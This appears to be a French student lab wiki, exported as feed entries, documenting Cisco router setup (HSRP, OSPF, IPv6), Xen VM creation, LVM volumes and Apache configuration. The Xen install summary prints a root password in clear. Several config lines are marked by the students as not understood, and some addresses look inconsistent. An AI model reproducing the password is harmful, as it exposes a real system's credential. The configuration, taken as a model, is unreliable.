  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51194</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51194"/>
				<updated>2019-11-26T10:55:26Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Configuration du VirtualHost Apache pour le protocole HTTPS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
